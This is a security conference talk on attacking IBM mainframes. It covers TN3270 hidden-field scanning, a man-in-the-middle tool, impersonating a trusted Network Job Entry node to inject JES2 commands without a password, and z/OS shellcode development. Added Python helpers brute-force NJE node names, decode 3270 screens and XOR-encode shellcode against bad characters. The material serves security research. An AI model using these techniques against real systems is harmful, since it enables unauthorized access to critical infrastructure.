Further Adventures in Mainframe Hacking
Security Necromancy: Further Adventures in Mainframe Hacking
B.U.M. Corp. Confidential – mainframed767 & bigendiansmalls

Genesis
• Wondered: Who's researching this shit? Published vulnerabilities by product (source: cvedetails.com):
  – Windows 4,951
  – Mac OSX 2,270
  – z/OS (mainframe) ZERO?? WTF

Imagine if you will … Your Doctor calls
[Slide: IBM's stated position on disclosure]
"IBM System z believes that the details of Security / Integrity APARs should not be made publically available. With the critical workloads running on these systems, the impact of a vulnerability being exploited, however, could severely damage customer operations and business. One of the benefits for not providing vulnerability details is that both external attackers and internal personnel threats can not get access to information that could put an enterprise at undue risk."
Source (ibm.com, DOC# ZSQ03054-USEN-03)

$100,000 Brick

So who are you?
• We're just two cool dudes
• And we are gonna rock your fucking socks off

BIG ENDIAN SMALLS
• Cut my teeth on AS400
• Love puzzles, breaking things
• Woke up in a panic – because of Mainframe!
• Realized I could get access to my own
• Started exploit dev research
• Wrote first z/OS shellcode (check your CD)
• Dedicating life to helping poor, unfortunate corporations secure their shit

SOLDIER OF FORTRAN (mainframed767)
• "in" to mainframes in the 90s courtesy of datapac (a Canadian x.25 network)
• Security Consultant
• Got my own mainframe
  – Realized it's not as great as engineers have said (shocker!)
• I've spoken domestically and internationally
• Released multiple tools from password sniffing to user enumeration

WTF is a Mainframe?
Picture is worth a thousand words: [slide: photo of a mainframe]

Reality
• Used by almost all Fortune 100s – 90% according to IBM!
  – But seriously look at this:
[Slide: a wall of several hundred organisation names reported as running mainframes, among them Pepsico, UBS, the City of Phoenix, Bank of America, VISA Inc., the Federal Reserve, the IRS, the United States Postal Service, JPMorgan Chase, HSBC, Walmart, Target, Home Depot, Delta Air Lines, Lockheed, General Motors, Ford, BMW, Kaiser Permanente, Medicare, Social Security, Lawrence Livermore National Laboratories, the NASDAQ Stock Market, the Reserve Bank of India, Deutsche Bundesbank, and a long list of state agencies, banks, insurers and universities.]

Two Parts
• First Half: Networking
  – Network Job Entry
  – TN3270 protocol fun!
• Second Half: Exploit Development
  – How to write exploits
  – Program debugging
  – Shellcode development
  – First z/OS Shellcode

Butt first
You need a quick refresher on what this looks like: [slides: screenshots of 3270 logon screens]

Networking

TN3270
• Imagine a world where telnet still exists
• Imagine no MORE!
• Basically like BBS's back in the day
• Uses a 'stream'

Field Attributes
• Screen is 1920 bytes long (24 rows of 80 columns)
• Each byte could be a field attribute identifying:
  – Color
  – Locked/Unlocked (Protected)
  – Visible/Invisible (Hidden)
[Slide: annotated logon screen – "Locked Field", "Length", "USERPG01"]
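Decoding those attribute bytes is what lets a scanner see protected and non-display fields without driving an emulator by hand. The following is an added example, not code from the talk or from the authors' nmap/Python tn3270 libraries: it applies one outbound 3270 write to the 1920-byte buffer, splits the buffer at Start Field orders, and reports each field's protected/hidden/intensified bits and text. Command, order and attribute-bit values are from IBM's 3270 Data Stream Programmer's Reference; the logon screen it parses is constructed sample data (the hidden APPLID/PGM field and the name USERPG01 are illustrative, not from a real system).

```python
"""Decode a 3270 outbound data stream into its 1920-byte buffer and list the fields.
Added example, not the talk's nmap or Python library. Command/order/attribute values are
from IBM's 3270 Data Stream Programmer's Reference; the logon screen is constructed data."""
ROWS, COLS = 24, 80
SCREEN = ROWS * COLS                          # 1920 bytes, as on the slide

CMD_WRITE, CMD_ERASE_WRITE, CMD_ERASE_WRITE_ALT = 0xF1, 0xF5, 0x7E   # TN3270 native command codes
SBA, SF, SFE, IC, PT, RA, EUA = 0x11, 0x1D, 0x29, 0x13, 0x05, 0x3C, 0x12   # buffer orders

# Field attribute byte: 0x20 protected, 0x10 numeric, 0x0C display bits
# (00 normal, 01 normal+pen detectable, 10 intensified, 11 non-display), 0x01 MDT.
ATTR_PROTECTED, ATTR_DISPLAY, ATTR_INTENSIFIED, ATTR_HIDDEN = 0x20, 0x0C, 0x08, 0x0C

# 6-bit value -> graphic code, used for 12-bit buffer addresses
ADDR_TABLE = bytes.fromhex(
    "40C1C2C3C4C5C6C7C8C94A4B4C4D4E4F50D1D2D3D4D5D6D7D8D95A5B5C5D5E5F"
    "6061E2E3E4E5E6E7E8E96A6B6C6D6E6FF0F1F2F3F4F5F6F7F8F97A7B7C7D7E7F")


def encode_address(addr):
    return bytes([ADDR_TABLE[(addr >> 6) & 0x3F], ADDR_TABLE[addr & 0x3F]])


def decode_address(b1, b2):
    """12-bit address (6 bits per byte) unless the top two bits of b1 are 00 (14-bit form)."""
    if b1 & 0xC0 == 0:
        return ((b1 & 0x3F) << 8) | b2
    return ((b1 & 0x3F) << 6) | (b2 & 0x3F)


def parse_stream(data):
    """Apply one outbound write to an empty buffer; return (buffer, {position: attribute})."""
    buf, attrs, i, pos = bytearray(SCREEN), {}, 0, 0
    if data and data[0] in (CMD_WRITE, CMD_ERASE_WRITE, CMD_ERASE_WRITE_ALT):
        i = 2                                  # skip command byte and WCC
    while i < len(data):
        b = data[i]
        if b == SBA:
            pos, i = decode_address(data[i + 1], data[i + 2]), i + 3
        elif b == SF:
            attrs[pos], buf[pos] = data[i + 1], 0
            pos, i = (pos + 1) % SCREEN, i + 2
        elif b == SFE:                         # (type, value) pairs; type 0xC0 is the basic attribute
            n, i, attr = data[i + 1], i + 2, 0x00
            for _ in range(n):
                if data[i] == 0xC0:
                    attr = data[i + 1]
                i += 2
            attrs[pos], buf[pos], pos = attr, 0, (pos + 1) % SCREEN
        elif b == RA:                          # repeat a character up to (not including) an address
            end, ch, i = decode_address(data[i + 1], data[i + 2]), data[i + 3], i + 4
            while True:
                buf[pos], pos = ch, (pos + 1) % SCREEN
                if pos == end:
                    break
        elif b == EUA:
            i += 3                             # nothing to erase in a freshly cleared buffer
        elif b in (IC, PT):
            i += 1
        else:                                  # ordinary EBCDIC character
            buf[pos], pos, i = b, (pos + 1) % SCREEN, i + 1
    return buf, attrs


def fields(data):
    """One entry per attribute byte; its text runs to the next attribute, wrapping at 1920."""
    buf, attrs = parse_stream(data)
    starts, out = sorted(attrs), []
    for n, start in enumerate(starts):
        end = starts[(n + 1) % len(starts)]
        if end <= start:
            end += SCREEN
        raw = bytes(buf[p % SCREEN] for p in range(start + 1, end))
        a = attrs[start]
        out.append({
            "row": start // COLS + 1, "col": start % COLS + 1,
            "protected": bool(a & ATTR_PROTECTED),
            "hidden": (a & ATTR_DISPLAY) == ATTR_HIDDEN,
            "intensified": (a & ATTR_DISPLAY) == ATTR_INTENSIFIED,
            "text": raw.replace(b"\x00", b"\x40").decode("cp037").rstrip(),   # nulls shown as spaces
        })
    return out


def hidden_fields(data):
    """Non-display fields: an emulator never paints them, but the stream still carries them."""
    return [f for f in fields(data) if f["hidden"]]


def build_logon_screen():
    """Constructed sample: a logon form with a hidden password field and a hidden protected
    field carrying a program name (USERPG01 here is made-up data)."""
    def at(row, col):
        return bytes([SBA]) + encode_address((row - 1) * COLS + (col - 1))

    def text(s):
        return s.encode("cp037")

    return (bytes([CMD_ERASE_WRITE, 0xC3])
            + at(1, 1) + bytes([SF, 0xE8]) + text("WELCOME TO TSO/E")             # protected, intensified
            + at(3, 1) + bytes([SF, 0x60]) + text("USERID   ===>")                # protected, normal
            + at(3, 15) + bytes([SF, 0x40])                                        # unprotected input
            + at(4, 1) + bytes([SF, 0x60]) + text("PASSWORD ===>")
            + at(4, 15) + bytes([SF, 0x4C])                                        # unprotected, non-display
            + at(6, 1) + bytes([SF, 0x6C]) + text("APPLID=TSO PGM=USERPG01")      # protected, non-display
            + at(24, 1) + bytes([SF, 0x60]) + text("PF3=EXIT")
            + bytes([IC]))
```

Running `hidden_fields(build_logon_screen())` returns two entries: the unprotected non-display input at row 4 column 15 (the password field) and the protected non-display text at row 6 column 1, which is exactly the kind of field a user at an emulator never sees but a scanner reading the raw stream does. Against a live host you would feed `parse_stream` the bytes that follow TN3270 negotiation instead of the constructed write.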
Identifyin'
• No support in nmap/other tools
• Hard to identify screens
  – Without getting an emulator
• What about Hidden Fields?
• Or Protected Values?

Until NOW!

NEW!
• TN3270 Library for NMAP
• Emulates a 'real' 3270 screen
• Allows you to:
  – Connect
  – Show the screen
  – Send commands
  – Detect hidden fields!
[Slides: nmap script output – "Samesies", "VTAM Application IDs", "VTAM Macros", "Hidden Fields!"]

But Wait! There's more!
I wrote one in LUA, why not Python?

tn3270lib
• Support tn3270 (not E)
• Creates a tn3270 object
• Allows for sending commands
• Blah blah blah same as nmap BUT NOW IT MEANS I CAN INTRODUCE:

SET'n'3270
3 modes
• Proxy/Passthrough – MitM
• Mirror a targeted mainframe
  – Connects, scrapes the screen, then shares that screen on your machine
  – Takes commands you might expect your target to send and pre-grabs those screens as well
• No args: TSO logon screen
• Supports SSL, which is cool cause clients don't check certs (like, at all, no warning, no nothing)

More Tools
• Big Iron Recon and Pwnage
  – By Dominic White!
  – https://github.com/sensepost/birp
• Mainframe Brute
  – Slower but prolly more reliable
  – https://github.com/sensepost/mainframe_brute

Network Job Entry

Jobs (not Steve)
• JCL (Job Control Language)
• Run by "JES"
• Made up of
  – STEPS
  – ProGraMs
  – etc

Network Job Entry
• Also known as NJE
• Runs on ports 175, 2252 (SSL)
• Developed in the 80s (??)

Works like this
[Slides: diagram of NJE nodes exchanging jobs]

Initial Setup
• Systems configure JES telling them:
  – Where to connect
  – Who they will accept connections from
How?
[Slide: JES2 parameters annotated – Number of Nodes, Our Node Name, Other nodes 'WASHDC', IP Address]

Connect
[Slide: TCP/IP connect, then the "OPEN" control record and the "ACK" reply. From: Network Job Entry (NJE) Formats and Protocols (SA32-0988-00)]

Once established
• You can send JCL
• You can send NMR (nodal message records: commands and messages)
• You are now a 'trusted' node
  – Depending on your security, of course

Interesting 'feature'
• Users from one node don't need to log on
• When a job is sent, the userID is sent along with the 'NJE' job
• So long as that account exists on the receiving side it will work.

NO Password
Note: no password or any authentication information is sent. Nodes are TRUSTED and therefore no need to re-authenticate.
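The OPEN/ACK exchange on the Connect slide, and the node-name requirement the rest of this section turns on, as an added example (not iNJEctor.py, the authors' nmap script or any IBM code): it builds and parses the 33-byte NJE-over-TCP control record (TYPE, RHOST, RIP, OHOST, OIP, R, as laid out in SA32-0988) and walks a list of candidate node names until the far end answers ACK instead of NAK. The responder is a constructed stand-in for a JES2 listener, it is assumed to echo the request's fields back with only TYPE and R changed, and the node names, IP addresses and NAK reason code are made up.

```python
"""NJE over TCP/IP: build and parse the 33-byte OPEN/ACK/NAK control record and drive a
node-name guess against it. Added example, not the talk's tooling. Record layout follows
the NJE Formats and Protocols manual (SA32-0988); the responder is a constructed stand-in
for a JES2 listener, and its node names, IPs and reason code are made up."""
import ipaddress

REC_LEN = 33                                  # TYPE(8) RHOST(8) RIP(4) OHOST(8) OIP(4) R(1)


def ebcdic(s, width=8):
    """Node names and record types travel as uppercase EBCDIC, space padded to 8."""
    return s.upper().ljust(width).encode("cp037")


def control_record(rtype, rhost, rip, ohost, oip, reason=0):
    """TYPE ('OPEN', 'ACK' or 'NAK'), receiving host name/IP, originating host name/IP, reason."""
    return (ebcdic(rtype) + ebcdic(rhost) + ipaddress.IPv4Address(rip).packed
            + ebcdic(ohost) + ipaddress.IPv4Address(oip).packed + bytes([reason & 0xFF]))


def parse_control_record(rec):
    if len(rec) != REC_LEN:
        raise ValueError(f"expected {REC_LEN}-byte NJE control record, got {len(rec)}")
    return {
        "type":   rec[0:8].decode("cp037").strip(),
        "rhost":  rec[8:16].decode("cp037").strip(),
        "rip":    str(ipaddress.IPv4Address(rec[16:20])),
        "ohost":  rec[20:28].decode("cp037").strip(),
        "oip":    str(ipaddress.IPv4Address(rec[28:32])),
        "reason": rec[32],
    }


class FakeJES2Node:
    """Constructed responder. JES2 completes the OPEN only when RHOST is its own node name
    and OHOST is a node it has a definition for; this models just that check."""
    NAK_UNKNOWN_NODE = 1                      # made-up reason code, for illustration only

    def __init__(self, name, ip, known_nodes):
        self.name, self.ip = name.upper(), ip
        self.known = {n.upper() for n in known_nodes}

    def handle(self, rec):
        r = parse_control_record(rec)
        ok = r["type"] == "OPEN" and r["rhost"] == self.name and r["ohost"] in self.known
        # Assumption: the reply carries the request's fields back; only TYPE and R change.
        return control_record("ACK" if ok else "NAK", r["rhost"], r["rip"], r["ohost"], r["oip"],
                              0 if ok else self.NAK_UNKNOWN_NODE)


def brute_node_names(target_node, target_ip, our_ip, candidates, send):
    """Send one OPEN per candidate OHOST through `send` (bytes -> bytes) and return the
    first name the target ACKs, or None. Against a live host, `send` would write the record
    to port 175 and read back 33 bytes."""
    for name in candidates:
        reply = parse_control_record(send(control_record("OPEN", target_node, target_ip, name, our_ip)))
        if reply["type"] == "ACK":
            return name
    return None


if __name__ == "__main__":
    target = FakeJES2Node("WASHDC", "10.0.0.5", ["NEWYORK", "CHICAGO"])    # constructed config
    guesses = ["HQ", "LONDON", "PROD", "NEWYORK"]
    print("accepted node name:", brute_node_names("WASHDC", "10.0.0.5", "10.0.0.9", guesses, target.handle))
```

Nothing in the record authenticates the caller: whoever can name a defined node and reach port 175 gets the ACK, which is why the node name matters as much as the IP address in the slides that follow.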
Breaking NJE
• First we need to find mainframes with NJE
• Problem: nmap
[Slides: nmap output]

NJE Node Names
• You need this.
• No, you NEED it.
• You can't connect otherwise

NMAP Script: NJE Node Brute
• Brute forces node names (even if the node is connected!)
[Slides: script output]

NJE is super awesome
• Like we said before: You need three things:
  – Node Name of your target
  – Node name you want to pretend to be
  – IP Address of your target
With these you can inject JES2 commands with:

iNJEctor.py
[Slides: demo output]

Books from the Past!
• A lot of our research is from really old books
• Like, really old
• Older than some of you here today:
[Slides: covers of old IBM manuals]

Exploit Development

Architecture
• 24, 31, 64 bit addressing modes
  – 3 sets of registers (16 ea)
  – Big Endian
  – Von Neumann Architecture
  – Stack-based (sorta)
• Virtual Address Spaces
• Program Status Word (PSW)
• z/OS, USS, z/Linux, z/VM

DC in a box
JAVA, LINUX, ASM, PL/I, WEB, WEBSPHERE, COBOL, CLOUD, MQ, HTTP, C, C++, JAVASCRIPT, MOBILE, UNIX, DB2 AND MORE!

Where to start
• Focus on what you know
• Unix System Services
• Why? Cause C and Assembler
  – Narrowed down to:
    • Buffer Overflow POC
    • Format String Exploit POC
    • Learn testing environment
    • Shell code development and deployment

[Slide: shellcode phases – Setup, Memory, Args and Execute, Cleanup & Exit]

Useful example
• Execute local shell
  – Useful for Privilege Escalation
• Steps
  – Build working C or HLASM
  – Convert to machine code
  – Once working, "shellcode-ize"
    • Remove bad chars or encode
  – Test with C buffer stub program
[Slides: source listings and debugger screenshots]

What's Next?
• MSF Integration?
• Native Exploits
• Java / Web exploits
• Privilege Escalation
• Continued Tool development / Porting
  – Generic shellcode building
  – Fuzzing

Thanks
• DEFCON for letting us talk about this
• IBM for this cool platform and online books
• Huge Mega Corps for neglecting this platform
• Dominic White for his tools
• Swedish underground community
• X3270 authors

Contact
• Phil – "Soldier of Fortran" @mainframed767 [email protected] Soldieroffortran.org
• Chad – "Big Endian Smalls" @bigendiansmalls [email protected] Bigendiansmalls.com
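Coming back to the "shellcode-ize" step on the Useful example slide: the following is an added host-side helper, not the talk's shellcode, stub program or tooling. It scans machine code for bad characters, picks a single-byte XOR key that leaves none in the encoded output (and is itself clean, since the key ends up inside the decoder), and emits the C array a buffer stub test would compile in. The bad-character set (NUL plus the EBCDIC NL and LF bytes a line-oriented C stub might mangle) is an assumption, the byte string is constructed filler rather than z/Architecture instructions, and the in-memory decoder that undoes the XOR before jumping to the payload would have to be written in HLASM and is not shown.

```python
"""Host-side 'shellcode-ize' helpers: bad-character scan, single-byte XOR encode with a
clean key, and C array output for a buffer stub test. Added example, not the talk's code.
BAD_CHARS and SAMPLE_CODE are assumptions/constructed data, not z/Architecture instructions."""
BAD_CHARS = {0x00, 0x15, 0x25}   # assumption: NUL terminator, EBCDIC NL, EBCDIC LF

SAMPLE_CODE = bytes.fromhex("0a0b 0015 c3d6 7e41 9000 1525 3f77")   # constructed filler


def find_bad_chars(code, bad=BAD_CHARS):
    """Sorted list of the bad characters actually present in `code`."""
    return sorted({b for b in code if b in bad})


def pick_xor_key(code, bad=BAD_CHARS):
    """Smallest single-byte key such that neither the key nor any encoded byte is a bad
    char; the key has to live inside the decoder stub, so it must be clean as well."""
    for key in range(1, 256):
        if key not in bad and all((b ^ key) not in bad for b in code):
            return key
    return None


def xor_encode(code, key):
    return bytes(b ^ key for b in code)


xor_decode = xor_encode          # XOR is its own inverse; the stub does this in place


def shellcodeize(code, bad=BAD_CHARS):
    """Return (key, encoded) with `encoded` free of bad chars, or raise if no key works."""
    key = pick_xor_key(code, bad)
    if key is None:
        raise ValueError("no single-byte XOR key avoids the bad character set; use a wider key")
    return key, xor_encode(code, key)


def to_c_array(name, data, per_line=12):
    """C source for the buffer stub: `unsigned char name[] = { ... };` plus its length."""
    rows = [", ".join(f"0x{b:02x}" for b in data[i:i + per_line])
            for i in range(0, len(data), per_line)]
    body = ",\n    ".join(rows)
    return f"unsigned char {name}[] = {{\n    {body}\n}};\nunsigned int {name}_len = {len(data)};"


if __name__ == "__main__":
    print("bad chars present:", [hex(b) for b in find_bad_chars(SAMPLE_CODE)])
    key, enc = shellcodeize(SAMPLE_CODE)
    print(f"key 0x{key:02x}, bad chars left after encoding: {find_bad_chars(enc)}")
    print(to_c_array("encoded", enc))
```

The generated array is what you paste into the stub that copies the bytes into a buffer and branches to them; the decoder prepended to it must apply the same key and stay clean itself, which is why `pick_xor_key` rejects keys that are bad characters.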